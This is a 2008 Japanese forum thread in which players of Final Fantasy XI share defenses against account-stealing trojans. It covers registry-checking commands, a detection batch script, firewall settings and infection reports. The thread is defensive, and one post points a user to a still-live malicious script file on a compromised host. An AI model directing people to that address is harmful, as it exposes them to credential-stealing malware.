●● RMT業者の垢ハックが多発している件36 ●●

このエントリーをはてなブックマークに追加
1既にその名前は使われています
★このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします

前スレ ●● RMT業者の垢ハックが多発している件35 ●● http://changi.2ch.net/test/read.cgi/ogame/1217834363/

■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を )
   不正アクセス専用チャットサポート = https://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み )
■テンプレ = ttp://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます) ttp://miku.xrea.jp/
FFIX Virus問題 まとめサイト(初心者さん向け) ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/

★「巻き戻し情報」「スクエニに法的責任を!」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
  別スレ ●● FF11垢ハック巻き戻し状況報告スレ ●● http://changi.2ch.net/test/read.cgi/ogame/1216987350/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです )
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
2既にその名前は使われています:2008/08/13(水) 18:56:59 ID:MgMLTT4Y
◆直近の話題◆
XREA上の一部サイトに、アカウントハックするウィルスをダウンロードさせるスクリプトが混入。
下記ページを該当時間に見た人は感染しているかどうかチェックを。

XREA 1039045744:88 の確認されたサイト

吟遊詩人テンプレ:メニュー ヘッダー
 8月2日23時45分頃〜8月7日21時40分頃
忍者スレテンプレ:メニュー </body>と</html>の間
 ?月?日?時?分頃〜8月10日2時15分頃
黒魔協会:xml宣言の前
 8月7日22時23分頃〜8月11日1時56分頃
FF11・マップガイド(ネット便利)フッターテーブル内
 8月9日00時00分頃〜8月11日00時00分頃


参考:http://miku.xrea.jp/content5/content5_xrea2.html
3既にその名前は使われています:2008/08/13(水) 19:10:15 ID:E7JCa3jG
平均復旧時間 一ヶ月

4既にその名前は使われています:2008/08/13(水) 19:13:39 ID:tKY7tQ/V
壱乙であります!
xreaっていうだけで怖くて踏めないw
5既にその名前は使われています:2008/08/13(水) 19:38:39 ID:piVc2l2U
Adobe - サポート - Adobe Flash Player のバージョンテスト
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
6既にその名前は使われています:2008/08/13(水) 20:14:48 ID:hDANwYFp
----------アカハック被害報告用テンプレ(書ききれない場合は複数レスに分けて下さい)----------
●気付いた日時(アカハック被害に気付いた日時)
●不審なアドレスのクリックの有無(blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス、ドメインのドット(.)を○等で置き換える事。h抜き等は駄目)
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等)
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等)
●他人が貴方のPCを使う可能性の有無(Yes/No)
●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明
●ネットカフェの利用の有無:Yes/No
●使っているOS(SP等まで書く)
●使用ブラウザ(バージョン等まで分かれば書く)
●WindowsUpdateの有無(最終更新日、等)
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し)
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)
●その他のSecurty対策(Spybot S&D、ルータ、等)
●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
●スレログやテンプレを読んだか(Yes/No/今から読みます)
●hosts変更(有/無・有りの場合は最終更新は何時ごろか)
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか)
●その他情報・症状など(書ききれない場合は次レスで書いてください)
7既にその名前は使われています:2008/08/13(水) 20:15:48 ID:hDANwYFp
報告用テンプレはこっちに出しておきます
8既にその名前は使われています:2008/08/13(水) 20:17:13 ID:GBjfqCiO
参考にする所がxreaが多いのは何故でありますか
9既にその名前は使われています:2008/08/13(水) 20:22:31 ID:+yDEIZqS
>>8
元々別のホスティングサービス使ってた
→そこが鯖管理費滞納だかで落ちた
→こりゃだめだーということでxreaに移転
→8月に入ったらxreaがやられた
10既にその名前は使われています:2008/08/13(水) 20:26:17 ID:+yDEIZqS
■各種ソフトのアップデート報告について

スレ内を検索しやすいように各種ソフトのupdate情報のレスには符丁をつけておくことを推奨します。

・FlashPlayerなどAdobe系ソフト ・Firefoxなどブラウザ ・NoScriptなどアドオン
などの更新があったときには
 ※※各種ソフトウェアアップデート情報※※

またセキュリティホールに関するニュースが出たときには
 ※※セキュリティホール情報※※

を付けてみてください。
11既にその名前は使われています:2008/08/13(水) 20:26:42 ID:+yDEIZqS
■具体的な自衛策その1(詳細は「>>1」の FF11Warningさんのところをじっくり読まれることをお勧めします)
1:ウイルススキャンソフト(ウィルス駆除ソフト)を導入する。
2:Windows UpdateでWindowsを最新の状態にする。
3:ファイアウォールを有効にする。
   有料ソフト等に同梱されているもの(同梱でなければ同じ会社から出ているもの)を使うか、フリーの
   ファイアウォールソフトを探し導入する(2chカテゴリ「ネット関係」>「セキュリティ」板にフリーの
   ファイアウォールソフトのスレッドがあります。「ファイアウォール」などの単語で検索してください)
4:PeerGuardian2(IPフィルタソフト)を導入する。
  ※リネージュ資料室からリンクされているHPにて配布されているPeerGuardian2日本語版がダウンロード
   できない模様(8月4日報告)。メニューは同じなので日本語マニュアルページと解説HPみながら英語版で。
   ★PG2公式 = ttp://phoenixlabs.org/pg2/
   ★DLページ(日本語サイト) = ttp://cowscorpion.com/Firewall/PeerGuardian.html
   ★日本語マニュアル = ttp://www.dukedog.flnet.org/Library/PG2/PG_Guide.html
  ※設定方法はここから
   ★リネージュ資料室 ttp://lineage.paix.jp/guide/security/basic-ipfilter.html
   ★PG2導入解説動画(改訂版)ニコ動 ttp://www.nicovideo.jp/watch/nm2825098
5:Firefox、Opera、Safariなど、IE以外のウェブブラウザを使用する。
  それぞれのブラウザにセキュリティホールが見つかることもあるので、アップデート情報には注意してください。
6:ネ実・mixi・ブログ等にある不審なURLを踏む場合は、まず「aguse.jp」や「ソースチェッカー」を使用する。
  ★aguse GATEWAY = ttp://www.aguse.jp/  ★ソースチェッカーオンライン = ttp://so.7walker.net/
12既にその名前は使われています:2008/08/13(水) 20:27:08 ID:+yDEIZqS
■具体的な自衛策その2
7:SecuniaPSI(各種アプリケーション・プラグインソフトが最新版であるかどうかをチェックするソフト)の導入。
   ★Secunia公式ページ = ttps://psi.secunia.com/
   ★SecuniaPSI RC3ダウンロードページ(日本語解説付き) = ttp://cowscorpion.com/Security/SecuniaPSI.html
8:プラグイン他、各種ソフトの更新
  Flashplayer、Realplayer、Shockwaveplayer、Quicktime、Adobe Acrobat/ReaderなどのソフトはOSやブラウザの
  更新と同じように更新を怠り無く。
   ★FlashPlayerのバージョン確認 = ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
   最新(現在は 9.0.124.0)未満の場合
   ★Adobeアップデート ttp://www.adobe.com/jp/downloads/updates/ で更新するか
   ★Adobeダウンロード ttp://www.adobe.com/jp/downloads で最新版と入れ替えてください。
   ※FlashPlayerはウェブブラウザごとに更新する必要があります。IEとFx使用なら両方で更新しましょう。
9:HIPS(レジストリや設定ファイルの変更を監視するソフト)の導入。
  Unleak・Spybot(Teatimer)などのレジストリ変更を監視してくれるソフトを入れておくと、今回のような
  レジストリ改ざんで動作するウィルスに対して「レジストリが変更される前に変更を許可するかどうかを
  問い合わせてくれる」ので「怪しい」と思った場合はそれを拒否することによってウィルスの活動を阻害し
  症状の発症を食い止めてくれます。
   ★Unleak = ttp://soft3304.net/Unleak/  ★Spybot = ttp://www.spybot.info/jp/
   ※レジストリ(あるいはシステム)を監視するソフトは複数入れると動作に問題が出ますから注意です。
13既にその名前は使われています:2008/08/13(水) 20:27:50 ID:+yDEIZqS
■警察への被害届け
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
  都道府県警察本部のサイバー犯罪相談窓口等一覧 = ttp://www.npa.go.jp/cyber/soudan.htm
2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
  (この段階を踏まずに直接所轄署に行くと「専門の窓口に連絡しろ」と言われてしまう可能性があります)
3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。
4:資料を持参して所轄の署に赴き「利用権の侵害」での被害を報告します。
  「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが
  家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
  利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。
■警察へ行く際に持っていく・用意しておくもの(過去スレで実際に警察へ行った被害者のレスから抜粋)
持っていったもの
 ●身分証明、印鑑  ●スクエニの会社情報  ●HPのプリントアウトしたもの
 ●プレイオンラインサポセンの電話番号(受け答えしてくれたサポセンの人の名前も伝えるといいかも)
警察で聞かれたもの
 ●プレイオンラインのIDとパスワード  ●キャラ名  ●犯行時間帯
 ●被害内容(なくなったゲーム内通貨・アイテム) ●プロバイダ
14既にその名前は使われています:2008/08/13(水) 20:28:20 ID:+yDEIZqS
■POL用ファイアーウォールの設定(アプリケーションルールでpol.exeの設定)
※これはpol.exeのプロセスの一部に同化してアカウント情報を送信するマルウェアにしか効果がありません。
 現在、上記に該当する既知のものはwzcsvbxm.dllを使う3種のみです。
※下記設定(記述の仕方)はお使いのソフトによって異なりますので、それぞれのソフトのFQAをご自身でご確認ください。
許可しているリモートIPの範囲
61.195.48.0-61.195.55.255 (61.195.48.0/21)
61.195.56.0-61.195.59.255 (61.195.56.0/22)
61.195.60.0-61.195.63.255 (61.195.60.0/22)
202.67.48.0-202.67.63.255 (202.67.48.0/20)
219.117.144.0-219.117.159.255 (219.117.144.0/20)
※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると
 設定が簡単になります。

空けているローカルポート TCP1024-65535 UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)
15既にその名前は使われています:2008/08/13(水) 20:30:19 ID:+yDEIZqS
ここまで一般テンプレ

なお、PG2の日本語版がDLできない件については、あちらサイトがメンテか
CGIサーバに不具合が出ている可能性もありますので、経過を見てください

以下「wzcsvbxm.dll」に対する臨時テンプレ
(7月以降猛威をふるっているPOL干渉型のアカハクトロイです)
16既にその名前は使われています:2008/08/13(水) 20:30:57 ID:+yDEIZqS
■「wzcsvbxm.dll」への感染に関して
感染の前兆症状(報告があったもの) ※感染していると思われるPCの症状
1:Windows Updateがフリーズする。
2:POLを起動するとエラーが出る(2回目からは正常に起動)
3:シャットダウンに時間がかかるようになった(「コンピュータの電源を切る」が表示されるまでに2分以上かかる)
4:POLを起動するとsvshost.exeによるPOL.exe干渉警告が出る。
5:アプリケーションの追加と削除を選択して表示されるまでに時間がかかるようになった。

また、感染の確認方法として

スタートボタン(あるいはExplorerから)→「マイ コンピュータ」を右クリック→メニューから「管理」を実行
→「コンピュータの管理」ウィンドウの左のツリーから「サービスとアプリケーション」→「サービス」を選択。
選択したとき、右窓の「Automatic Updates」を選んで表示される説明が「Windowsの更新のダウンロードと〜」
のように日本語で表示されるかを確認。
トロイの木馬wzcsvbxm.dllは欧文の説明文を内部に持っているので、説明文が「Enables the download and 〜」に
なっていたら感染の疑いありです(System32フォルダ内にwzcsvbxm.dllがいないかどうか探してください)
17既にその名前は使われています:2008/08/13(水) 20:31:26 ID:+yDEIZqS
■「wzcsvbxm.dll」がPCに存在するか調べる方法(1)
Explorerで検索する場合は「ツール→フォルダオプション→表示タブ」で「ファイルとフォルダの表示」が
「すべてのファイルとフォルダを表示する」の選択がされていることと「保護されたオペレーティングシステム
ファイルを表示しない(推奨)」のチェックを外してあることを確認。マイコンピュータ上で「右クリック→検索
→ファイルとフォルダすべて→詳細設定オプション」で「システムフォルダの検索」「隠しファイルとフォルダの
検索」「サブフォルダの検索」にチェックを入れて検索してください。

■「wzcsvbxm.dll」がPCに存在するか調べる方法(2)
コマンドプロンプト(スタート→プログラム→アクセサリにあります)を開いて、そこに
attrib %SystemRoot%\system32\wzcsvbxm.dll /s -s -h -r ←をコピペしてenter
存在しない場合 = 「ファイルが見つかりません-○:\WINDOWS\system32\wzcsvbxm.dll」(○はドライブ名)
存在する場合 = 何も表示されず次のコマンド受付状態になるので、System32フォルダを開いて探せば見つかります。

■「wzcsvbxm.dll」の検索結果について
1:wzcsvbxm.dllが「%SystemRoot%\system32」のディレクトリに見つからなければ、wzcsvbxm.dllに関しては
  感染していません(%SystemRoot%はシステムがいるHDD上のディレクトリ表示。たとえばC:\WINDOWS)
2:wzcsvbxm.dllが「HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\」などに見つかった
  場合、検索した履歴を保存しているだけなので放置して大丈夫です(HKEYと付くのはレジストリ)
18既にその名前は使われています:2008/08/13(水) 20:32:17 ID:+yDEIZqS
■「wzcsvbxm.dll」がPCに存在するか調べる方法(3)
「(このレスをコピペ)」と書いてあるレスをエディタにコピペして***.bat(***の部分はなんでも○)で
保存し、保存したらExplorer上からでもダブルクリック。
※テキストエディタにワードバットなどリッチテキストで保存できるエディタの場合、リッチテキスト形式で
 ファイルを作って保存すると動きませんので、保存はテキストドキュメントで行ってください。
ダブルクリックなどで動作させたら、それが終わるまでに10秒ほどかかります。
「続行するには何かキーを押してください...」が出てくるまでお待ちください。
※これを実行した結果表示の★の部分になにも表示されないPC環境もあるようです。
 他の検索方法を試してwzcsvbxm.dllがPC内にいるかいないかをあわせて確認してください。
19既にその名前は使われています:2008/08/13(水) 20:34:05 ID:+yDEIZqS
@echo off && REM REG.EXE ver3.0 (このレスをコピペ)
for /L %%i in (1, 1, 9) do (reg query HKLM\SYSTEM\ControlSet00%%i > NUL 2>&1
if ERRORLEVEL 1 call :nai
if ERRORLEVEL 0 call :aru %%i)
for /L %%i in (10, 1, 99) do (reg query HKLM\SYSTEM\ControlSet0%%i > NUL 2>&1
if ERRORLEVEL 1 call :nai
if ERRORLEVEL 0 call :aru2 %%i)
reg query HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
echo =========================================================================
sc qdescription wuauserv
pause
goto :EOF
:nai
exit /b -1
:aru
reg query HKLM\SYSTEM\ControlSet00%1\Services\wuauserv\Parameters
exit /b
:aru2
reg query HKLM\SYSTEM\ControlSet0%1\Services\wuauserv\Parameters
exit /b
20既にその名前は使われています:2008/08/13(水) 20:34:54 ID:+yDEIZqS
■上記バッチファイルを実行した例(★の部分が違ってたらヤバイかも)
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★

! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★

! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★
=========================================================================
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: wuauserv
DESCRIPTION : Windows ←★
続行するには何かキーを押してください...
21既にその名前は使われています:2008/08/13(水) 20:35:38 ID:+yDEIZqS
■レジストリからwzcsvbxm.dllを探す方法
スタート→ファイル名を指定して実行→regedit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSetxxx(xxxは数字)\Services\wuauserv\Parametersと
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parametersの中の
「ServiceDll」→「REG_EXPAND_SZ(種類)」の「データ」を確認

C:\WINDOWS\system32\wuauserv.dllならそのままクローズ(この件の感染はしていない)
C:\WINDOWS\system32\wzcsvbxm.dllなど上記以外のファイルが登録されていた場合、感染している可能性が極めて大。
まず安全な環境でパスを変更しwzcsvbxm.dllをwuauserv.dllに書き換えられるなら書き換える等の対策をする。
ただし、すぐに戻ってしまう報告もあるため修正後要確認。
本体(生成元)および感染ルートは現状不明なため、上記の修正をしたとしても完全に駆除されているか分かりませんので
最終的な回答は「感染が確認された場合はクリーンインストール推奨」ということになります。


以上「wzcsvbxm.dll」に対する臨時テンプレでした。
22既にその名前は使われています:2008/08/13(水) 20:36:46 ID:uLZxbCbf
いつかテンプレに罠を仕込まれるなw
長すぎw
23既にその名前は使われています:2008/08/13(水) 20:38:36 ID:+yDEIZqS
とりあえずテンプレ貼り終了、&注意喚起のために再掲

◆直近の話題◆
XREA上の一部サイトに、アカウントハックするウィルスをダウンロードさせるスクリプトが混入。
下記ページを該当時間に見た人は感染しているかどうかチェックを。

XREA 1039045744:88 の確認されたサイト

吟遊詩人テンプレ:メニュー ヘッダー
 8月2日23時45分頃〜8月7日21時40分頃
忍者スレテンプレ:メニュー </body>と</html>の間
 ?月?日?時?分頃〜8月10日2時15分頃
黒魔協会:xml宣言の前
 8月7日22時23分頃〜8月11日1時56分頃
FF11・マップガイド(ネット便利)フッターテーブル内
 8月9日00時00分頃〜8月11日00時00分頃

上記ページ以外にも未確認の被害サイトが存在する可能性が高いので、
8月に入ってからWeb上で情報収集を行ったPCユーザーはチェック推奨。
24既にその名前は使われています:2008/08/13(水) 21:03:08 ID:hDANwYFp
wzcsvbxm.dllのテンプレはもう必要ないかなと思ったけど張っちゃったか
25既にその名前は使われています:2008/08/13(水) 21:03:39 ID:PVyZ6+Hy
Windowsupdateあげ
26既にその名前は使われています:2008/08/13(水) 21:07:45 ID:uPqebfMx
FF11Warning(垢ハックについての対策とか詳しく載ってます) ttp://miku.xrea.jp/
xreaだから 不安な場合は ミラーへttp://www.geocities.jp/ff11warning/

今回の改ざんに関するXREAのサポート掲示板
ttp://sb.xrea.com/showthread.php?t=12960
>スクリプト経由で書き換えられている可能性が高いと思われます。
とのことで .htaccessでphpの設定しろとのこと
ただ 今日phpのバージョンアップをしててphp4は4.4.9(EOL)に php5は5.2.6(安定版最新)に更新されてる。
ttp://sb.xrea.com/showthread.php?s=1956ebd9e29b23e70a3a6ea137f04781&p=84507#post84507
5月以前の更新の際に設定が変わると明記されてたのに 今回の件で実は設定変えてなかったことがばれた。
27既にその名前は使われています:2008/08/13(水) 21:10:23 ID:RrnZzkBq
>>24
未だに山田オルタに感染してるアホがいるくらいだから、
いつでも古いウィルス感染する奴はいるだろう。

爺鯖のShaupuが罠ツールで涙目ww ロリ動画2本目
http://changi.2ch.net/test/read.cgi/ogame/1218592539/
28既にその名前は使われています:2008/08/13(水) 21:14:16 ID:K3CECdBf
>>17
んじゃついでに。
XREAで撒かれたのは「KarnaeghDrv.dll」、
これがsystem32にいたら乙。
29既にその名前は使われています:2008/08/13(水) 21:15:09 ID:hDANwYFp
XREAサイト改竄の罠については「サイトのhtmlソースを直接改変し罠サイトへの
強制アクセススクリプトを仕込む」というものなので、とりあえずブラウザの
スクリプト実行を不許可にしておけば大丈夫です
30既にその名前は使われています:2008/08/13(水) 21:25:17 ID:dDD4V9ke
>>29
揚げ足をとる様で悪いが読んだ側が思った以上に受け取ることもある
「スクリプト実行を不許可にしておけ」くらいで丁度いい
31既にその名前は使われています:2008/08/13(水) 21:30:36 ID:rN/FkYeY
POL→FFXIの切り替え時に
wmiadapt.exeってプロセスが数秒起動して消えるんだけど
これって危ない・・・?
カスペスキャンでは何もひっかからないんだけど
ググってもよくわからないし('A`)
32既にその名前は使われています:2008/08/13(水) 21:42:05 ID:hDANwYFp
33既にその名前は使われています:2008/08/13(水) 21:43:47 ID:5R2NMXn/
>>31
それだけじゃなんともいえないけど,wmiadapt.exeで動くマルウェアはあるよー.
exeファイルをウィルストータルになげて結果はってくだちい.

http://www.virustotal.com/jp/
34既にその名前は使われています:2008/08/13(水) 21:59:53 ID:rN/FkYeY
結果のリンクを張ればいいかな?
35既にその名前は使われています:2008/08/13(水) 21:59:57 ID:0WdMGXhC
今週の頭に垢ハックされました・・・ウィルスバスターがあると過信
していた自分にも責任があると思いますが、何だかやりきれない
感じです。一端、全スキャンをして、駆除できたと思ったのですが
PCを立ち上げる度に下記のような警告が出て困っています。
どなたか、ご指導頂けると幸いです。
※HDD初期化しか手はないのですかね。
--------------------
Hostsファイルは変更されました。
URL情報(Hostsファイル)は変更されました。ネット詐欺(ファーミング)の
可能性があります。ヒント:変更していなければ
拒否を選択してください。

127.0.0.1 へ localhost は接続します(変更)
--------------------
36既にその名前は使われています:2008/08/13(水) 22:02:17 ID:9fxH5Wrk
>>34
そうそう,結果URLはってくれればいいw
調べてみたけどwmiadapt.exeって正規プロセスはないしマルウェアの可能性が高いとは思うよー.


37既にその名前は使われています:2008/08/13(水) 22:03:32 ID:rN/FkYeY
38既にその名前は使われています:2008/08/13(水) 22:06:09 ID:9fxH5Wrk
>>35
KarnaeghDrv.dllの挙動としてHostsに排他URLつっこんでる奴を一網打尽にするべくHostsファイルを消しちゃいます.
マルウェアは絶賛活動中だとは思うよ.クリンスコしたほうが絶対によろしい.
けど,原因わからないと気持ち悪いだろうしカスペルスキーのオンラインスキャンでもしてきて結果はってくれれば把握しやすいかなー.みんな.
39既にその名前は使われています:2008/08/13(水) 22:08:00 ID:9fxH5Wrk
>>37
ありがとー.どこも引っかかってないなあ.
wmiadapt.exeなんてプログラムなんかあったっけか・・・.
40既にその名前は使われています:2008/08/13(水) 22:11:53 ID:uPqebfMx
>>37
wmiadapt.exeは パワポに汚染ファイル>officeの脆弱性>wmiadapt.exe>systhin.dll生成
って 2006年時点でほとんどのベンダーがパターン認識してるから
その結果だと新種の可能性高いかも
41既にその名前は使われています:2008/08/13(水) 22:12:15 ID:hDANwYFp
>>39
新種か亜種のウィルスなのかも?
過去にその名前で実行登録するウィルスは存在してますね
42既にその名前は使われています:2008/08/13(水) 22:15:01 ID:9fxH5Wrk
>>40
そう思えるよねえ.POL>FF起動時にプロセス動き出すってのも既存のwmiadapt.exeでは聞いたことのない挙動だし.
スタート>プログラムを指定して実行>RegEdit>編集>検索でwmiadapt.exeを検索して引っかかったところ全部書き出してほしいなー.


43既にその名前は使われています:2008/08/13(水) 22:17:09 ID:RfphjKzw
マジでRMTでギルかったり売ってる奴むかつくわぁ
44既にその名前は使われています:2008/08/13(水) 22:18:46 ID:rN/FkYeY
>>32のトレンドマイクロのサイトでは
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon\shell の値を変更されるとありましたが
見つからず。

検索かけてみたところ
HKEY_LOCALMACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\Sources
の値が変更されてました。
XP64bitだからなんだろうか・・・とりあえずレジストリ修正してファイル消して挙動見てみます
45既にその名前は使われています:2008/08/13(水) 22:22:08 ID:K3CECdBf
64はわからんわ お手上げ
46既にその名前は使われています:2008/08/13(水) 22:27:20 ID:rN/FkYeY
レジストリ修正→削除→FF起動で
wmiadapt.exeの動きは無くなりました
とりあえずパス変えて様子を見てみようかと思います
47既にその名前は使われています:2008/08/13(水) 22:34:03 ID:G9Cd433N
騒動が治まるまで有料鯖でもXREA使ってたら接続はよした方がいいみたいだね
La Mirageとかネトゲサイトの有名どころが使っててびびったし
48既にその名前は使われています:2008/08/13(水) 22:41:25 ID:9fxH5Wrk
うーん.WMI Performance Adapterサービスでつかうのはwmiapsrv.exeだったはずだからなー.
wmiadapt.exeがドロッパなのか,悪さする本体なのかはこの時点ではなんともいえないけどクリンスコしちゃったほうがいいよ.精神衛生上もw
最後まで付き合いたいが,これから家族つれて帰省せにゃならんのですまんけど後は任せた!
49既にその名前は使われています:2008/08/13(水) 22:52:30 ID:0WdMGXhC
>>38

35に書いた者ですが、カスペルスキーでスキャンしたところ以下の
感染が発見されました。

C:\WINDOWS\system32\KarnaeghDrv.dll
感染: Trojan-GameThief.Win32.OnLineGames.biuv
50既にその名前は使われています:2008/08/13(水) 22:55:08 ID:AjeLPFYd
>>49

早く削除して!!!
それある限りパス抜かれるよ!!
51既にその名前は使われています:2008/08/13(水) 22:55:11 ID:e+GDJdUw
>>49
あらあらドンピシャだ。
FFをやる上ではバスターはかなり性能はよろしくないから、この際アンインスコして
カスペの体験版とかを入れて駆除しなされ
というか一旦クリーンインスコがよさそうだなぁ
52既にその名前は使われています:2008/08/13(水) 22:55:29 ID:gZPzSaeU
Virustotalで検査しているファイルが正規ファイルのwmiadap.exeで
みんなが話しているのはwmiadapt.exeってトロイなあたりに突っ込みは
ないわけ?
53既にその名前は使われています:2008/08/13(水) 22:59:52 ID:lkkgiYGY
>>49
カスペさんに感謝しろよ
お前もう一回パス抜かれる所だったんだから
54既にその名前は使われています:2008/08/13(水) 23:02:56 ID:xZ+Ipihk
「FF11・マップガイド(ネット便利)」をサイトで掲載されている期間に行った覚えがあるので
このスレの検索方法で色々と検索しているのですが、その件で教えていただきたい事が、、
>>17-18
の(1)(2)では検出されませんでした、(3)はちょっとよくわからないのでやってません。
そして、>>21の「レジストリからwzcsvbxm.dllを探す方法」で
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet(数字)\Services\wuauserv\Parameters
(私の場合01と02があったので両方を見ました。)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parameter

この3つのServiceDllのデータを見たところ、3つ全部が
%systemroot%\system32\wuaueng.dllとなっていました。

>>21からすると、、、C:\WINDOWS\system32\「wuauserv.dll」ではないという事は
やっぱり感染しているという事ですかね?
いちよう、昼ごろに垢ハックされる危険性があるとサイトで知ったので、
別端末でのPOLのパスワード変更して、そのままにしてあります。


 
55既にその名前は使われています:2008/08/13(水) 23:05:46 ID:0WdMGXhC
49です。
みなさん、ご指摘有難う御座います。
※防衛が甘過ぎると再認識させられました。この際、PCでのプレイを止め
箱にでも切り替えるか検討中です。
56既にその名前は使われています:2008/08/13(水) 23:07:19 ID:J64cwx30
>>54
それは正規ファイルだと思う

次からテンプレにwuaueng.dllを追加した方がいいかも
57既にその名前は使われています:2008/08/13(水) 23:10:14 ID:0WdMGXhC
一つ質問です。
駆除の為、現在導入のソフトのアンインストールが必要ですが、当然ネットは
切断した後に行ったほうがいいですよね?
58既にその名前は使われています:2008/08/13(水) 23:13:42 ID:J64cwx30
>>57
ウィルスを削除したのでなければトレンドマイクロに検体提出して欲しいところ
59既にその名前は使われています:2008/08/13(水) 23:18:52 ID:K3CECdBf
>>58
送付済みっす。
Kasperskyの命名からするとXREAトロイの
(把握している中では)4世代中2世代目、
生息していたのは8日夜から11日夜まで。
初代のは対応早かったんだけどなぁ。
60既にその名前は使われています:2008/08/13(水) 23:24:28 ID:IsChCS1T
>>2に追加。仕込まれてたスクリプトの情報がないけど、同じと思われる。 XREAじゃなくても危ない模様。

Final Fantasy XI Web Portal ( http://ffxiweb■com/ )
 ?月?日?時?分頃〜8月11日?時?分頃

http://miara.sakura.ne.jp/ff/cgi-bin/talk/index.cgi?mode=resform&res=29373 より引用
> ■ [No.29373] 【注意】“FF11 リンク集”に罠スクリプト / 2008-08-10(日) 23:09:24 [返信|引用] 投稿者 / J
> ←のFF11リンク集でリンクされている、
> “Final Fantasy XI Web Portal”様のサイト(フッターに埋め込まれているので、おそらく全ページがアウトだと思われます)に、
> 危険なドメインに誘導すると思われるスクリプトが埋め込まれています。
> みなさまご注意を。

> ■ [No.29379] Re: / 2008-08-11(月) 02:27:40 [返信|引用] 投稿者 / じゅんたる
> こんばんは。いつもお世話になっています。
> Final Fantasy XI Web Portal管理人のじゅんたるです。
>
> 罠スクリプト確認しました。
> 対策できるまで当サイトを一時停止しました。
> 近日中には復旧できると思います。
> ご迷惑をおかけして申し訳ありませんでした。
61既にその名前は使われています:2008/08/13(水) 23:36:28 ID:hDANwYFp
罠スクリプトそのものを見てみたいな
どんなふうに書かれてるのか
62既にその名前は使われています:2008/08/13(水) 23:40:54 ID:BZcE8L8B
>>56
そうでしたか。んでは、この件に関してはひとまず安心か。

ただ、MAPサイト土日に踏んでるとは思うんだよなぁ。どうしたものか
うーんカスペルスキースキャンでもウイルスバスターが隔離してるウィルス?以外それっぽいの見当たらないんだけども、、、
クリーンインスコされてる方はこれといった確証はないけどしているんですかね
63既にその名前は使われています:2008/08/13(水) 23:54:27 ID:6puEHWWP
>>62
現状の危険度からすると、安 全 な 確 証 が無い限りクリーンインストールし直した方が良いんじゃないかと。
64既にその名前は使われています:2008/08/13(水) 23:56:43 ID:K9+YqjOZ
ここ踏んでしまったのですが大丈夫でしょうか?
http://coffer.hp.infoseek.co■jp/
65既にその名前は使われています:2008/08/13(水) 23:56:52 ID:dDD4V9ke
>>61
1039045744:88/jp■jsは生きてるぞ
見方が判らないとか言うなよ?
66既にその名前は使われています:2008/08/13(水) 23:57:06 ID:iMMWdqk7
ウイルススキャンは常に後手だと何度言ったら・・・
67既にその名前は使われています:2008/08/13(水) 23:58:45 ID:hDANwYFp
>>65
ありがとうございます、見てきます
68既にその名前は使われています:2008/08/14(木) 00:00:00 ID:K3CECdBf
>>64
ネットワーク板
http://pc11.2ch.net/hack/
勇気がなくて踏めない人のための鑑定スレPart18
http://pc11.2ch.net/test/read.cgi/hack/1208760889/
